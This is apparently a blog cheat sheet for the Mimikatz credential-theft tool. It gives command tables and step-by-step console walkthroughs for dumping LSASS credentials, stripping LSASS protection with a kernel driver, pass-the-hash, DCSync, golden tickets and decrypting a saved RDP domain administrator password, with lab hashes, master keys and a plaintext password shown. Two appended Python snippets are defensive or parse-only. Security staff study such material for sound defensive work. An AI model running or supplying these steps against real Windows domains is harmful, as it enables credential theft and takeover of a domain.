Mimikatz is a commonly used tool for extracting credentials from Microsoft Windows systems. It can be downloaded here: https://github.com/gentilkiwi/mimikatz
A PowerShell port of Mimikatz is also available here: https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1
Mimikatz Commands
Privilege Escalation
| Command | Description |
|---|---|
| `privilege::debug` | Enable debug privileges. |
| `token::elevate` | Elevate current process token. |
| `token::revert` | Revert token privileges. |
| `token::whoami` | Display information about the current user's token. |
Password Extraction and Manipulation
| Command | Description |
|---|---|
| `sekurlsa::logonpasswords` | Extract credentials from memory. |
| `lsadump::sam` | Extract the SAM database. |
| `sekurlsa::wdigest` | Extract WDigest credentials. |
| `sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<NTLM_hash>` | Perform pass-the-hash attack. |
| `sekurlsa::ekeys` | List Kerberos keys. |
| `lsadump::dcsync /domain:<DomainFQDN> /all` | Perform a DCSync attack against a domain controller. |
| `sekurlsa::minidump lsass.DMP` | Extract passwords from a minidump file. |
Kerberos Attacks
| Command | Description |
|---|---|
| `kerberos::list` | List Kerberos tickets in memory. |
| `sekurlsa::tickets /export` | Export Kerberos tickets. |
| `sekurlsa::tickets /purge` | Purge Kerberos tickets from memory. |
| `kerberos::ptt <ticket_file>` | Pass-the-ticket: import a Kerberos ticket from a file. |
| `kerberos::golden /user:<username> /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_hash> /ticket:<ticket_file>` | Create a Kerberos golden ticket. |
| `kerberos::tgt` | Dump current TGT information. |
| `kerberos::ptc <target_SPN>` | Pass-the-credential: request a service ticket based on the current TGT for a given SPN. |
| `kerberos::list /export` | Export Kerberos tickets to file. |
Crypto & Certificate Operations
| Command | Description |
|---|---|
| `crypto::capi` | Patches the CryptoAPI to make keys exportable. |
| `crypto::certificates` | List certificates in memory. |
| `crypto::keys` | List keys in memory. |
| `crypto::certificates /export` | Export certificates. |
DPAPI & Windows Credential Vault
| Command | Description |
|---|---|
| `dpapi::masterkey /in:<masterkey_file>` | Load a DPAPI master key from a file. |
| `dpapi::cache` | List the DPAPI credentials cache. |
| `dpapi::cred /in:C:\key\location /masterkey:<MASTERKEY>` | Decrypt a DPAPI-encrypted file using a master key. |
| `vault::list` | List Windows vault credentials. |
| `sekurlsa::dpapi` | Dump DPAPI keys for all users. |
Miscellaneous
| Command | Description |
|---|---|
| `misc::memssp` | Patches LSASS so credentials are logged to C:\Windows\System32\mimilsa.log. |
Usage Examples
One Line Commands
If you're executing Mimikatz from a non-interactive command shell, each command supplied as a parameter needs to be enclosed in double quotes, as in the example below:

```
C:\Tools>mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 1648146 (00000000:00192612)
Session           : Interactive from 5
User Name         : alice
Domain            : BORDERGATE
Logon Server      : DC01
Logon Time        : 29/04/2024 17:30:10
SID               : S-1-5-21-1220112391-3624315575-3511410581-1104
        msv :
         [00000003] Primary
         * Username   : alice
         * Domain     : BORDERGATE
         * NTLM       : 64f12cddaa88057e06a81b54e73b949b
         * SHA1       : cba4e545b7ec918129725154b29f055e4cd5aea8
         * DPAPI      : 7392169935f1a74665da82b62773cff3
```
Removing PPL Protection from LSASS
Upload the mimidriver.sys driver to the directory you are running Mimikatz from, then execute the following commands to remove PPL protection from LSASS:

```
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # sekurlsa::logonpasswords
```
The driver can be removed with:
```
mimikatz # !processprotect /process:lsass.exe
mimikatz # !-
```
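From the defender's side, the step in this sequence that leaves the clearest trace is the driver load: `!+` installs mimidriver.sys as a kernel-mode driver service from whatever directory Mimikatz is run from, which the Service Control Manager records as System event 7045. The following is an added example, not code from the page or from Mimikatz: it evaluates 7045 records exported as dicts and flags kernel-mode drivers installed from outside the usual driver directories. The sample records are constructed, and the service name used for the Mimikatz driver is an assumption.

```python
# Directories a kernel-mode driver is normally installed from (lower-case, after normalisation).
TRUSTED_DRIVER_DIRS = ("c:\\windows\\system32\\drivers\\", "c:\\windows\\system32\\driverstore\\")

def normalise_image_path(image_path):
    """Reduce the ImagePath spellings seen in 7045 records to one lower-case drive path."""
    p = image_path.strip().strip('"').lower()
    if p.startswith("\\??\\"):                 # \??\C:\Tools\x.sys
        p = p[4:]
    if p.startswith("\\systemroot\\"):         # \SystemRoot\System32\drivers\x.sys
        p = "c:\\windows\\" + p[len("\\systemroot\\"):]
    if p.startswith("system32\\"):             # system32\drivers\x.sys (relative to SystemRoot)
        p = "c:\\windows\\" + p
    return p.replace("%systemroot%", "c:\\windows")

def is_suspicious_driver_install(event):
    """True for a System 7045 (service installed) record describing a kernel-mode driver
    whose image file sits outside the usual driver directories."""
    if event.get("EventID") != 7045:
        return False
    if "kernel mode driver" not in str(event.get("ServiceType", "")).lower():
        return False
    return not normalise_image_path(event.get("ImagePath", "")).startswith(TRUSTED_DRIVER_DIRS)

def triage(events):
    """(ServiceName, ImagePath) for every record that should go to an analyst."""
    return [(e["ServiceName"], e["ImagePath"]) for e in events if is_suspicious_driver_install(e)]

# Constructed sample records (not captured telemetry), shaped like the 7045 event data fields.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "cdrom", "ImagePath": r"\SystemRoot\System32\drivers\cdrom.sys",
     "ServiceType": "kernel mode driver", "StartType": "demand start", "AccountName": ""},
    {"EventID": 7045, "ServiceName": "Spooler", "ImagePath": r"C:\Windows\System32\spoolsv.exe",
     "ServiceType": "user mode service", "StartType": "auto start", "AccountName": "LocalSystem"},
    # The driver the page uploads next to mimikatz.exe; the service name here is an assumption.
    {"EventID": 7045, "ServiceName": "mimidrv", "ImagePath": r"\??\C:\Tools\mimidriver.sys",
     "ServiceType": "kernel mode driver", "StartType": "demand start", "AccountName": ""},
]
```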
Extracting Windows Vault RDP Credentials
Mimikatz can be used to extract saved Credential Manager passwords, such as saved RDP credentials.
![](https://www.bordergate.co.uk/wp-content/uploads/2024/05/vault_creds.png)
First, we need to list the credential files available, which are stored in the user's AppData folder:

```
dir /a C:\Users\alice\AppData\Local\Microsoft\Credentials\
 Volume in drive C has no label.
 Volume Serial Number is 2AD5-BF62

 Directory of C:\Users\alice\AppData\Local\Microsoft\Credentials

01/05/2024  18:43    <DIR>          .
01/05/2024  18:41    <DIR>          ..
01/05/2024  18:43               396 AA1843CE085D8B96A03D81C3D6CD5F07
29/04/2024  18:29            11,052 DFBE70A7E5CC19A398EBF1B96859CE5D
               2 File(s)         11,448 bytes
               2 Dir(s)  50,326,667,264 bytes free
```
We can then use Mimikatz to find which master encryption key is associated with a credential:

```
mimikatz # dpapi::cred /in:C:\Users\alice\AppData\Local\Microsoft\Credentials\AA1843CE085D8B96A03D81C3D6CD5F07
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {22df88d6-46f5-4560-9d07-b905b6399b34}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 00000030 - 48
  szDescription      : Local Credential Data
  algCrypt           : 00006603 - 26115 (CALG_3DES)
  dwAlgCryptLen      : 000000c0 - 192
  dwSaltLen          : 00000010 - 16
  pbSalt             : 6c9182a4f6dd09325d57ad0aba6d3b8b
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         :
  algHash            : 00008004 - 32772 (CALG_SHA1)
  dwAlgHashLen       : 000000a0 - 160
  dwHmac2KeyLen      : 00000010 - 16
  pbHmack2Key        : 532c59ee0aa855aa6149b85fcab9dd62
  dwDataLen          : 000000c8 - 200
  pbData             : 16946411679f4b62b3895689e4cfe8986a1b55ddb50a5e4744ad991ef972c3159f962b8322b3a1a76539e5dc58398322976459afb66b2aa7fc0f43b954959e920e797deda07bf85d10a4f92d8d6ab18d5b0f8b40b419a89348609b3965ac35fe7de72d159317d57c00a331d2d0e949827d39c05d9c9db576c61aa899ceaa403468bed3f6a0c3bbf5d921285993cbbfe332233c7b17b48dad7c542f0622561c8baf107cca67946869e32e8e1b6c44f29a775b78e8334b1db047852c1f76b2a2e206dda3431d4229fe
  dwSignLen          : 00000014 - 20
  pbSign             : 7d0232eee442038935c1ff4c2d36ae813052ed39
```
Mimikatz can then be used to decrypt the master encryption key:
```
mimikatz # dpapi::masterkey /in:C:\Users\alice\AppData\Roaming\Microsoft\Protect\S-1-5-21-1220112391-3624315575-3511410581-1104\22df88d6-46f5-4560-9d07-b905b6399b34 /rpc
**MASTERKEYS**
  dwVersion          : 00000002 - 2
  szGuid             : {22df88d6-46f5-4560-9d07-b905b6399b34}
  dwFlags            : 00000000 - 0
  dwMasterKeyLen     : 00000088 - 136
  dwBackupKeyLen     : 00000068 - 104
  dwCredHistLen      : 00000000 - 0
  dwDomainKeyLen     : 00000174 - 372

[masterkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : 874710a496905265bff3b8d7c32a9ce5
    rounds           : 00004650 - 18000
    algHash          : 00008009 - 32777 (CALG_HMAC)
    algCrypt         : 00006603 - 26115 (CALG_3DES)
    pbKey            : 852645998d9f798f7f587da5e0168678f3b948796de93a32d8ec5b76e8da2a818e3d48e484a276cc85a08606cad8de5cf6eeda708f1c2b0ab39ae8b49164a35539bcc20fcb36b756ad9a739b429626f56a8ab41e1d2e3925686e4a918ac2a8e103df57406c41603c

[backupkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : e6cad989a10dfd8c3006f1c7189ff1c7
    rounds           : 00004650 - 18000
    algHash          : 00008009 - 32777 (CALG_HMAC)
    algCrypt         : 00006603 - 26115 (CALG_3DES)
    pbKey            : 215aae5e4f871dd1bbff35da4d2327a18b3c2e6d5e1b3a66357a995e6f9601a5ec7d7dc7479ec71a0e6d9ed1ba880527688ac6e961a5b6dfee4fccea65f787f9df79dcfb241e22f7

[domainkey]
  **DOMAINKEY**
    dwVersion        : 00000002 - 2
    dwSecretLen      : 00000100 - 256
    dwAccesscheckLen : 00000058 - 88
    guidMasterKey    : {b357e77b-14ca-40b1-8bbb-4519ccd27f56}
    pbSecret         : ae90378cef835e995f1b0f7f6dff82914c2897e567ec0c93916b06418b383037d973700b34c36cb2ed82c774197f737b4738275616b0a26721aa836dd8720e166d2d709133a130417845adb36a0a988f40cca376e73ff2083660b2816bec030db585aa5bd90bdf9983e701642d9f2b91bbe5a79649c3014b62b094e4aeaaa87c905195d10c6eb70c074a79ccf1c76d02132fc32bbd818d969991c5e7e8b5347a743bc697d9f70296c438475ad7e8705220d545950a8eb2b43679e3c12b8f2b6932fc2b0d0786c9c4d3f0888b63336078751a77fd2064e2bf47b24ca118b266559dbd0eea136fb7b3c9b4aeba90e7c5f903f23efdfeee7253c18e5d2f55e3d96c
    pbAccesscheck    : a9bf58ff84d39b1342d054382143ddfc0d0da80baa7f90e8bc6c1fdda8cd728d4ae01e37697cf36ac54a2cdc9db8d87ec86ac4cd511e66471b1dcb50fd94e73cdcf30553b70881fe06f87ba802fda40beaa9d13c50a24a67

Auto SID from path seems to be: S-1-5-21-1220112391-3624315575-3511410581-1104

[backupkey] without DPAPI_SYSTEM:
  key : 1bef6c3f1d68fed793f40adf81f40af5fad20c7b6a7a260c6b03e249d05dc823
  sha1: 87b7a5d5fffc653128d09c0a65afe9470b7d2c07

[domainkey] with RPC
[DC] 'bordergate.local' will be the domain
[DC] 'DC01.bordergate.local' will be the DC server
  key : 14695a9f73ecb64de687480d456e5b277ba9b29e0be2a5bab72ba8fd012420248ac0c9372bd45f113c4347803bf09ca56f6afb59be67a88c81f2dfbdedb95263
  sha1: b535443c8c459fe08911f85779f1bbed0bf9bef6
```
Using the master key we just extracted, we can decrypt the RDP password:

```
mimikatz # dpapi::cred /in:C:\Users\alice\AppData\Local\Microsoft\Credentials\AA1843CE085D8B96A03D81C3D6CD5F07 /masterkey:14695a9f73ecb64de687480d456e5b277ba9b29e0be2a5bab72ba8fd012420248ac0c9372bd45f113c4347803bf09ca56f6afb59be67a88c81f2dfbdedb95263
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {22df88d6-46f5-4560-9d07-b905b6399b34}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 00000030 - 48
  szDescription      : Local Credential Data
  algCrypt           : 00006603 - 26115 (CALG_3DES)
  dwAlgCryptLen      : 000000c0 - 192
  dwSaltLen          : 00000010 - 16
  pbSalt             : 6c9182a4f6dd09325d57ad0aba6d3b8b
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         :
  algHash            : 00008004 - 32772 (CALG_SHA1)
  dwAlgHashLen       : 000000a0 - 160
  dwHmac2KeyLen      : 00000010 - 16
  pbHmack2Key        : 532c59ee0aa855aa6149b85fcab9dd62
  dwDataLen          : 000000c8 - 200
  pbData             : 16946411679f4b62b3895689e4cfe8986a1b55ddb50a5e4744ad991ef972c3159f962b8322b3a1a76539e5dc58398322976459afb66b2aa7fc0f43b954959e920e797deda07bf85d10a4f92d8d6ab18d5b0f8b40b419a89348609b3965ac35fe7de72d159317d57c00a331d2d0e949827d39c05d9c9db576c61aa899ceaa403468bed3f6a0c3bbf5d921285993cbbfe332233c7b17b48dad7c542f0622561c8baf107cca67946869e32e8e1b6c44f29a775b78e8334b1db047852c1f76b2a2e206dda3431d4229fe
  dwSignLen          : 00000014 - 20
  pbSign             : 7d0232eee442038935c1ff4c2d36ae813052ed39

Decrypting Credential:
 * volatile cache: GUID:{22df88d6-46f5-4560-9d07-b905b6399b34};KeyHash:b535443c8c459fe08911f85779f1bbed0bf9bef6;Key:available
 * masterkey     : 14695a9f73ecb64de687480d456e5b277ba9b29e0be2a5bab72ba8fd012420248ac0c9372bd45f113c4347803bf09ca56f6afb59be67a88c81f2dfbdedb95263
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 000000c2 - 194
  credUnk0       : 00000000 - 0

  Type           : 00000002 - 2 - domain_password
  Flags          : 00000000 - 0
  LastWritten    : 01/05/2024 14:43:56
  unkFlagsOrSize : 00000018 - 24
  Persist        : 00000002 - 2 - local_machine
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : Domain:target=TERMSRV/DC01
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : BORDERGATE\Administrator
  CredentialBlob : Password1
  Attributes     : 0
```
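The walkthrough above finds the right master key by reading guidMasterKey from the dpapi::cred output and looking it up under Protect\<SID>. The script below is an added example, not code from the page or from Mimikatz: it parses the same **BLOB** header fields in the order Mimikatz prints them and derives the master key file path, without decrypting anything, which is enough to inventory which master key each saved credential depends on during an investigation. It assumes the blob has already been cut out of the short header at the start of a Credential Manager file; its sample blob is constructed from the GUIDs on the page with filler bytes elsewhere.

```python
import struct
import uuid
# Provider GUID seen in every blob's guidProvider field on the page; CALG ids as printed there.
DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
CALG_3DES, CALG_SHA1 = 0x6603, 0x8004

def _u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0], off + 4
def _guid(buf, off):  # Windows stores GUIDs mixed-endian, hence bytes_le
    return uuid.UUID(bytes_le=bytes(buf[off:off + 16])), off + 16
def _counted(buf, off):  # a dwXxxLen DWORD followed by that many bytes of pbXxx
    n, off = _u32(buf, off)
    return bytes(buf[off:off + n]), off + n

def parse_dpapi_blob(buf):
    """Walk the **BLOB** header fields in the order dpapi::cred prints them. Decrypts nothing."""
    f, off = {}, 0
    f["dwVersion"], off = _u32(buf, off)
    f["guidProvider"], off = _guid(buf, off)
    if f["guidProvider"] != DPAPI_PROVIDER:
        raise ValueError("guidProvider mismatch: not a DPAPI blob")
    f["dwMasterKeyVersion"], off = _u32(buf, off)
    f["guidMasterKey"], off = _guid(buf, off)
    f["dwFlags"], off = _u32(buf, off)
    desc, off = _counted(buf, off)
    f["szDescription"] = desc.decode("utf-16-le").rstrip("\x00")
    f["algCrypt"], off = _u32(buf, off)
    f["dwAlgCryptLen"], off = _u32(buf, off)
    f["pbSalt"], off = _counted(buf, off)
    f["pbHmacKey"], off = _counted(buf, off)
    f["algHash"], off = _u32(buf, off)
    f["dwAlgHashLen"], off = _u32(buf, off)
    f["pbHmac2Key"], off = _counted(buf, off)
    f["pbData"], off = _counted(buf, off)
    f["pbSign"], off = _counted(buf, off)
    if off != len(buf):
        raise ValueError("trailing bytes after pbSign")
    return f
def masterkey_file(profile_dir, sid, fields):
    """Master key file this blob depends on, i.e. the path the page feeds to dpapi::masterkey."""
    return rf"{profile_dir}\AppData\Roaming\Microsoft\Protect\{sid}\{fields['guidMasterKey']}"
def build_blob(mk_guid, description, salt, hmac2_key, data, sign):  # same layout; sample input only
    c = lambda b: struct.pack("<I", len(b)) + b
    return (struct.pack("<I", 1) + DPAPI_PROVIDER.bytes_le + struct.pack("<I", 1) + mk_guid.bytes_le
            + struct.pack("<I", 0x20000000) + c((description + "\x00").encode("utf-16-le"))  # flags as on page
            + struct.pack("<II", CALG_3DES, 192) + c(salt) + c(b"") + struct.pack("<II", CALG_SHA1, 160)
            + c(hmac2_key) + c(data) + c(sign))
# Constructed sample: the page's master key GUID, filler bytes elsewhere.
SAMPLE_BLOB = build_blob(uuid.UUID("22df88d6-46f5-4560-9d07-b905b6399b34"), "Local Credential Data",
                         bytes(16), bytes(16), bytes(200), bytes(20))
```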
Common Errors
If you receive the error message kuhl_m_sekurlsa_acquireLSA, ensure you are running the command in an Administrator command prompt and that the privilege::debug command has been issued first:

```
mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 1648146 (00000000:00192612)
Session           : Interactive from 5
User Name         : alice
Domain            : BORDERGATE
Logon Server      : DC01
Logon Time        : 29/04/2024 18:00:10
SID               : S-1-5-21-1220112391-3624315575-3511410581-1104
        msv :
         [00000003] Primary
         * Username   : alice
         * Domain     : BORDERGATE
         * NTLM       : 64f12cddaa88057e06a81b54e73b949b
         * SHA1       : cba4e545b7ec918129725154b29f055e4cd5aea8
         * DPAPI      : 7392169935f1a74665da82b62773cff3
```